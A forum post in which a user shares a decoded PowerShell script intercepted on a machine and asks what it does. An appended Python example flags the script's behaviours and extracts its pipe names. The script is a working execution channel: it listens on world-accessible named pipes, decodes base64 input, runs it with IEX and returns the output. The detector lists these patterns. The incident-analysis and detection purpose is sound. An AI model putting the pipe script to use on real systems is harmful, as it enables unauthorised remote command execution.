Hi all,
I've detected an attempt to execute a PowerShell command on a machine, and after decoding it, I retrieved these commands:
$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
$sb =
{
param ($pn, $pm)
add-Type -assembly "System.Core"
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pr = new-object System.IO.StreamReader($p)
$o = $pr.ReadLine()
$p.Dispose();
$pr.Dispose();
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pw = new-object System.IO.StreamWriter($p)
$pw.AutoFlush = $true
$pw.WriteLine($o);
$p.Dispose();
}
add-Type -assembly "System.Core"
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);
Start-Sleep 600
$t.StopJob()
Is there anyone who can help me understand what this stands for?
Thank you very much in advance!!
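
A triage check for decoded script text like the one above, added here as an example and not part of the original post: it flags the behaviours visible in the script (a named pipe server with an "Everyone" access rule, a base64 decode, `IEX`, a background job) and resolves the pipe names it uses. The function name `triage`, the indicator labels and the benign sample are assumptions made for illustration.

```python
import re

# Behaviours visible in the posted script, as case-insensitive patterns.
INDICATORS = {
    "pipe_server": r"NamedPipeServerStream",
    "pipe_acl_everyone": r"PipeAccessRule\(\s*[\"']Everyone[\"']",
    "base64_decode": r"FromBase64String",
    "dynamic_eval": r"\b(IEX|Invoke-Expression)\b",
    "background_job": r"\bStart-Job\b",
}

def triage(script):
    """Return matched indicators, resolved pipe names and an overall verdict."""
    hits = {name for name, rx in INDICATORS.items()
            if re.search(rx, script, re.IGNORECASE)}
    # Literal assignments such as $pn = "awkywlhbod"
    literals = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]+)"', script))
    # Variables passed as the pipe name to a server stream
    name_vars = re.findall(r"NamedPipeServerStream\(\s*\$(\w+)", script, re.IGNORECASE)
    pipes = sorted({literals[v] for v in name_vars if v in literals})
    # Text read from a pipe, base64-decoded and evaluated: flag for escalation
    escalate = {"pipe_server", "base64_decode", "dynamic_eval"} <= hits
    return {"hits": sorted(hits), "pipes": pipes, "escalate": escalate}

# Excerpt of the script from the post (some lines omitted, order kept).
POSTED = '''
$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
'''

# Constructed benign script: base64 handling without pipes or evaluation.
BENIGN = '''
$b = [System.Convert]::FromBase64String($cfg)
Set-Content -Path out.bin -Value $b -Encoding Byte
'''

if __name__ == "__main__":
    for label, text in (("posted", POSTED), ("benign", BENIGN)):
        print(label, triage(text))
```

The resolved pipe names can then be searched for in endpoint telemetry that records named pipe creation and connection on the affected host.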